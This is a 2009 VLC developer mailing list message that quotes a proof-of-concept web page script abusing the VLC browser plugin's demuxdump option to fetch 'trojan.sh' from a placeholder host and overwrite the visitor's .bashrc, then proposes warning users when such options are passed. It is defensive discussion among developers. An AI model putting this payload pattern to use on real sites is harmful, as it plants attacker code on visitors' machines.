[vlc-devel] Regarding the seemingly still "obscure" security problem

Jean-Baptiste Kempf jb at videolan.org
Sat Jan 17 16:34:04 CET 2009


On Sat, Jan 17, 2009 at 03:26:25PM +0200, Rémi Denis-Courmont wrote :
> <script type="text/javascript"><!--
>   var vlc = document.getElementById("vlc");
>   var src = "http/dump://www.example.com/trojan.sh";
>   var dst = ".bashrc";
>   vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
>   vlc.playlist.play ();
> //!--></script>
> </body>
> </html>

I think this was brought to attention during the summit.

One question is: could we, in the plugin call add( ),
detect demuxdump, sout and file-logging options and in that case,
warn the user that some file will be overwritten?

Best Regards,

-- 
Jean-Baptiste Kempf
http://www.jbkempf.com/



More information about the vlc-devel mailing list